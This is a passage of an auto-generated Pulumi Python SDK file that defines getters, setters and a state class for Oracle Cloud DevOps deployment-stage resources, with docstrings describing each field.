@pulumi.getter(name="blueBackendIps")
def blue_backend_ips(self) -> Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "blue_backend_ips")
@blue_backend_ips.setter
def blue_backend_ips(self, value: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]):
pulumi.set(self, "blue_backend_ips", value)
@property
@pulumi.getter(name="computeInstanceGroupDeployEnvironmentId")
def compute_instance_group_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A compute instance group environment OCID for rolling deployment.
"""
return pulumi.get(self, "compute_instance_group_deploy_environment_id")
@compute_instance_group_deploy_environment_id.setter
def compute_instance_group_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compute_instance_group_deploy_environment_id", value)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deployArtifactId")
def deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional binary artifact OCID user may provide to this stage.
"""
return pulumi.get(self, "deploy_artifact_id")
@deploy_artifact_id.setter
def deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_artifact_id", value)
@property
@pulumi.getter(name="deployArtifactIds")
def deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) Additional file artifact OCIDs.
"""
return pulumi.get(self, "deploy_artifact_ids")
@deploy_artifact_ids.setter
def deploy_artifact_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "deploy_artifact_ids", value)
@property
@pulumi.getter(name="deploymentSpecDeployArtifactId")
def deployment_spec_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the artifact that contains the deployment specification.
"""
return pulumi.get(self, "deployment_spec_deploy_artifact_id")
@deployment_spec_deploy_artifact_id.setter
def deployment_spec_deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_spec_deploy_artifact_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment stage.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="dockerImageDeployArtifactId")
def docker_image_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A Docker image artifact OCID.
"""
return pulumi.get(self, "docker_image_deploy_artifact_id")
@docker_image_deploy_artifact_id.setter
def docker_image_deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "docker_image_deploy_artifact_id", value)
@property
@pulumi.getter(name="failurePolicy")
def failure_policy(self) -> Optional[pulumi.Input['DeployStageFailurePolicyArgs']]:
"""
(Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
"""
return pulumi.get(self, "failure_policy")
@failure_policy.setter
def failure_policy(self, value: Optional[pulumi.Input['DeployStageFailurePolicyArgs']]):
pulumi.set(self, "failure_policy", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="functionDeployEnvironmentId")
def function_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Function environment OCID.
"""
return pulumi.get(self, "function_deploy_environment_id")
@function_deploy_environment_id.setter
def function_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_deploy_environment_id", value)
@property
@pulumi.getter(name="functionTimeoutInSeconds")
def function_timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) Timeout for execution of the Function. Value in seconds.
"""
return pulumi.get(self, "function_timeout_in_seconds")
@function_timeout_in_seconds.setter
def function_timeout_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "function_timeout_in_seconds", value)
@property
@pulumi.getter(name="greenBackendIps")
def green_backend_ips(self) -> Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "green_backend_ips")
@green_backend_ips.setter
def green_backend_ips(self, value: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]):
pulumi.set(self, "green_backend_ips", value)
@property
@pulumi.getter(name="isAsync")
def is_async(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) A boolean flag specifies whether this stage executes asynchronously.
"""
return pulumi.get(self, "is_async")
@is_async.setter
def is_async(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_async", value)
@property
@pulumi.getter(name="isValidationEnabled")
def is_validation_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) A boolean flag specifies whether the invoked function should be validated.
"""
return pulumi.get(self, "is_validation_enabled")
@is_validation_enabled.setter
def is_validation_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_validation_enabled", value)
@property
@pulumi.getter(name="kubernetesManifestDeployArtifactIds")
def kubernetes_manifest_deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
"""
return pulumi.get(self, "kubernetes_manifest_deploy_artifact_ids")
@kubernetes_manifest_deploy_artifact_ids.setter
def kubernetes_manifest_deploy_artifact_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "kubernetes_manifest_deploy_artifact_ids", value)
@property
@pulumi.getter(name="loadBalancerConfig")
def load_balancer_config(self) -> Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]:
"""
(Updatable) Specifies config for load balancer traffic shift stages.
"""
return pulumi.get(self, "load_balancer_config")
@load_balancer_config.setter
def load_balancer_config(self, value: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]):
pulumi.set(self, "load_balancer_config", value)
@property
@pulumi.getter(name="maxMemoryInMbs")
def max_memory_in_mbs(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Maximum usable memory for the Function (in MB).
"""
return pulumi.get(self, "max_memory_in_mbs")
@max_memory_in_mbs.setter
def max_memory_in_mbs(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_memory_in_mbs", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="okeClusterDeployEnvironmentId")
def oke_cluster_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Kubernetes cluster environment OCID for deployment.
"""
return pulumi.get(self, "oke_cluster_deploy_environment_id")
@oke_cluster_deploy_environment_id.setter
def oke_cluster_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "oke_cluster_deploy_environment_id", value)
@property
@pulumi.getter(name="rollbackPolicy")
def rollback_policy(self) -> Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]:
"""
(Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
"""
return pulumi.get(self, "rollback_policy")
@rollback_policy.setter
def rollback_policy(self, value: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']]):
pulumi.set(self, "rollback_policy", value)
@property
@pulumi.getter(name="rolloutPolicy")
def rollout_policy(self) -> Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]:
"""
(Updatable) Description of rollout policy for load balancer traffic shift stage.
"""
return pulumi.get(self, "rollout_policy")
@rollout_policy.setter
def rollout_policy(self, value: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']]):
pulumi.set(self, "rollout_policy", value)
@property
@pulumi.getter(name="trafficShiftTarget")
def traffic_shift_target(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Specifies the target or destination backend set.
"""
return pulumi.get(self, "traffic_shift_target")
@traffic_shift_target.setter
def traffic_shift_target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "traffic_shift_target", value)
@property
@pulumi.getter(name="waitCriteria")
def wait_criteria(self) -> Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]:
"""
(Updatable) Specifies wait criteria for the Wait stage.
"""
return pulumi.get(self, "wait_criteria")
@wait_criteria.setter
def wait_criteria(self, value: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']]):
pulumi.set(self, "wait_criteria", value)
@pulumi.input_type
class _DeployStageState:
def __init__(__self__, *,
approval_policy: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']] = None,
blue_backend_ips: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_artifact_id: Optional[pulumi.Input[str]] = None,
deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
deploy_pipeline_id: Optional[pulumi.Input[str]] = None,
deploy_stage_predecessor_collection: Optional[pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']] = None,
deploy_stage_type: Optional[pulumi.Input[str]] = None,
deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input['DeployStageFailurePolicyArgs']] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
green_backend_ips: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']] = None,
is_async: Optional[pulumi.Input[bool]] = None,
is_validation_enabled: Optional[pulumi.Input[bool]] = None,
kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
load_balancer_config: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']] = None,
max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
rollback_policy: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']] = None,
rollout_policy: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
traffic_shift_target: Optional[pulumi.Input[str]] = None,
wait_criteria: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']] = None):
"""
Input properties used for looking up and filtering DeployStage resources.
:param pulumi.Input['DeployStageApprovalPolicyArgs'] approval_policy: (Updatable) Specifies the approval policy.
:param pulumi.Input['DeployStageBlueBackendIpsArgs'] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[str] compartment_id: The OCID of a compartment.
:param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
:param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
:param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
:param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
:param pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs'] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
:param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
:param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
:param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
:param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
:param pulumi.Input['DeployStageFailurePolicyArgs'] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
:param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
:param pulumi.Input['DeployStageGreenBackendIpsArgs'] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
:param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
:param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param pulumi.Input['DeployStageLoadBalancerConfigArgs'] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
:param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
:param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
:param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input['DeployStageRollbackPolicyArgs'] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
:param pulumi.Input['DeployStageRolloutPolicyArgs'] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
:param pulumi.Input[str] state: The current state of the deployment stage.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] time_created: Time the deployment stage was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] time_updated: Time the deployment stage was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
:param pulumi.Input['DeployStageWaitCriteriaArgs'] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
"""
if approval_policy is not None:
pulumi.set(__self__, "approval_policy", approval_policy)
if blue_backend_ips is not None:
pulumi.set(__self__, "blue_backend_ips", blue_backend_ips)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if compute_instance_group_deploy_environment_id is not None:
pulumi.set(__self__, "compute_instance_group_deploy_environment_id", compute_instance_group_deploy_environment_id)
if config is not None:
pulumi.set(__self__, "config", config)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deploy_artifact_id is not None:
pulumi.set(__self__, "deploy_artifact_id", deploy_artifact_id)
if deploy_artifact_ids is not None:
pulumi.set(__self__, "deploy_artifact_ids", deploy_artifact_ids)
if deploy_pipeline_id is not None:
pulumi.set(__self__, "deploy_pipeline_id", deploy_pipeline_id)
if deploy_stage_predecessor_collection is not None:
pulumi.set(__self__, "deploy_stage_predecessor_collection", deploy_stage_predecessor_collection)
if deploy_stage_type is not None:
pulumi.set(__self__, "deploy_stage_type", deploy_stage_type)
if deployment_spec_deploy_artifact_id is not None:
pulumi.set(__self__, "deployment_spec_deploy_artifact_id", deployment_spec_deploy_artifact_id)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if docker_image_deploy_artifact_id is not None:
pulumi.set(__self__, "docker_image_deploy_artifact_id", docker_image_deploy_artifact_id)
if failure_policy is not None:
pulumi.set(__self__, "failure_policy", failure_policy)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_deploy_environment_id is not None:
pulumi.set(__self__, "function_deploy_environment_id", function_deploy_environment_id)
if function_timeout_in_seconds is not None:
pulumi.set(__self__, "function_timeout_in_seconds", function_timeout_in_seconds)
if green_backend_ips is not None:
pulumi.set(__self__, "green_backend_ips", green_backend_ips)
if is_async is not None:
pulumi.set(__self__, "is_async", is_async)
if is_validation_enabled is not None:
pulumi.set(__self__, "is_validation_enabled", is_validation_enabled)
if kubernetes_manifest_deploy_artifact_ids is not None:
pulumi.set(__self__, "kubernetes_manifest_deploy_artifact_ids", kubernetes_manifest_deploy_artifact_ids)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if load_balancer_config is not None:
pulumi.set(__self__, "load_balancer_config", load_balancer_config)
if max_memory_in_mbs is not None:
pulumi.set(__self__, "max_memory_in_mbs", max_memory_in_mbs)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if oke_cluster_deploy_environment_id is not None:
pulumi.set(__self__, "oke_cluster_deploy_environment_id", oke_cluster_deploy_environment_id)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if rollback_policy is not None:
pulumi.set(__self__, "rollback_policy", rollback_policy)
if rollout_policy is not None:
pulumi.set(__self__, "rollout_policy", rollout_policy)
if state is not None:
pulumi.set(__self__, "state", state)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
if traffic_shift_target is not None:
pulumi.set(__self__, "traffic_shift_target", traffic_shift_target)
if wait_criteria is not None:
pulumi.set(__self__, "wait_criteria", wait_criteria)
@property
@pulumi.getter(name="approvalPolicy")
def approval_policy(self) -> Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]:
"""
(Updatable) Specifies the approval policy.
"""
return pulumi.get(self, "approval_policy")
@approval_policy.setter
def approval_policy(self, value: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]):
pulumi.set(self, "approval_policy", value)
@property
@pulumi.getter(name="blueBackendIps")
def blue_backend_ips(self) -> Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "blue_backend_ips")
@blue_backend_ips.setter
def blue_backend_ips(self, value: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']]):
pulumi.set(self, "blue_backend_ips", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="computeInstanceGroupDeployEnvironmentId")
def compute_instance_group_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A compute instance group environment OCID for rolling deployment.
"""
return pulumi.get(self, "compute_instance_group_deploy_environment_id")
@compute_instance_group_deploy_environment_id.setter
def compute_instance_group_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compute_instance_group_deploy_environment_id", value)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deployArtifactId")
def deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional binary artifact OCID user may provide to this stage.
"""
return pulumi.get(self, "deploy_artifact_id")
@deploy_artifact_id.setter
def deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_artifact_id", value)
@property
@pulumi.getter(name="deployArtifactIds")
def deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) Additional file artifact OCIDs.
"""
return pulumi.get(self, "deploy_artifact_ids")
@deploy_artifact_ids.setter
def deploy_artifact_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "deploy_artifact_ids", value)
@property
@pulumi.getter(name="deployPipelineId")
def deploy_pipeline_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a pipeline.
"""
return pulumi.get(self, "deploy_pipeline_id")
@deploy_pipeline_id.setter
def deploy_pipeline_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_pipeline_id", value)
@property
@pulumi.getter(name="deployStagePredecessorCollection")
def deploy_stage_predecessor_collection(self) -> Optional[pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']]:
"""
(Updatable) Collection containing the predecessors of a stage.
"""
return pulumi.get(self, "deploy_stage_predecessor_collection")
@deploy_stage_predecessor_collection.setter
def deploy_stage_predecessor_collection(self, value: Optional[pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']]):
pulumi.set(self, "deploy_stage_predecessor_collection", value)
@property
@pulumi.getter(name="deployStageType")
def deploy_stage_type(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment stage type.
"""
return pulumi.get(self, "deploy_stage_type")
@deploy_stage_type.setter
def deploy_stage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_stage_type", value)
@property
@pulumi.getter(name="deploymentSpecDeployArtifactId")
def deployment_spec_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the artifact that contains the deployment specification.
"""
return pulumi.get(self, "deployment_spec_deploy_artifact_id")
@deployment_spec_deploy_artifact_id.setter
def deployment_spec_deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_spec_deploy_artifact_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment stage.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="dockerImageDeployArtifactId")
def docker_image_deploy_artifact_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A Docker image artifact OCID.
"""
return pulumi.get(self, "docker_image_deploy_artifact_id")
@docker_image_deploy_artifact_id.setter
def docker_image_deploy_artifact_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "docker_image_deploy_artifact_id", value)
@property
@pulumi.getter(name="failurePolicy")
def failure_policy(self) -> Optional[pulumi.Input['DeployStageFailurePolicyArgs']]:
"""
(Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
"""
return pulumi.get(self, "failure_policy")
@failure_policy.setter
def failure_policy(self, value: Optional[pulumi.Input['DeployStageFailurePolicyArgs']]):
pulumi.set(self, "failure_policy", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="functionDeployEnvironmentId")
def function_deploy_environment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Function environment OCID.
"""
return pulumi.get(self, "function_deploy_environment_id")
@function_deploy_environment_id.setter
def function_deploy_environment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_deploy_environment_id", value)
@property
@pulumi.getter(name="functionTimeoutInSeconds")
def function_timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) Timeout for execution of the Function. Value in seconds.
"""
return pulumi.get(self, "function_timeout_in_seconds")
@function_timeout_in_seconds.setter
def function_timeout_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "function_timeout_in_seconds", value)
@property
@pulumi.getter(name="greenBackendIps")
def green_backend_ips(self) -> Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]:
"""
(Updatable) Collection of backend environment IP addresses.
"""
return pulumi.get(self, "green_backend_ips")
@green_backend_ips.setter
def green_backend_ips(self, value: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']]):
pulumi.set(self, "green_backend_ips", value)
@property
@pulumi.getter(name="isAsync")
def is_async(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) A boolean flag specifies whether this stage executes asynchronously.
"""
return pulumi.get(self, "is_async")
@is_async.setter
def is_async(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_async", value)
@property
@pulumi.getter(name="isValidationEnabled")
def is_validation_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) A boolean flag specifies whether the invoked function should be validated.
"""
return pulumi.get(self, "is_validation_enabled")
@is_validation_enabled.setter
def is_validation_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_validation_enabled", value)
@property
@pulumi.getter(name="kubernetesManifestDeployArtifactIds")
def kubernetes_manifest_deploy_artifact_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
"""
return pulumi.get(self, "kubernetes_manifest_deploy_artifact_ids")
@kubernetes_manifest_deploy_artifact_ids.setter
def kubernetes_manifest_deploy_artifact_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "kubernetes_manifest_deploy_artifact_ids", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="loadBalancerConfig")
def load_balancer_config(self) -> Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]:
"""
(Updatable) Specifies config for load balancer traffic shift stages.
"""
return pulumi.get(self, "load_balancer_config")
@load_balancer_config.setter
def load_balancer_config(self, value: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']]):
pulumi.set(self, "load_balancer_config", value)
@property
@pulumi.getter(name="maxMemoryInMbs")
def max_memory_in_mbs(self) -> Optional[pulumi.Input[str]]:
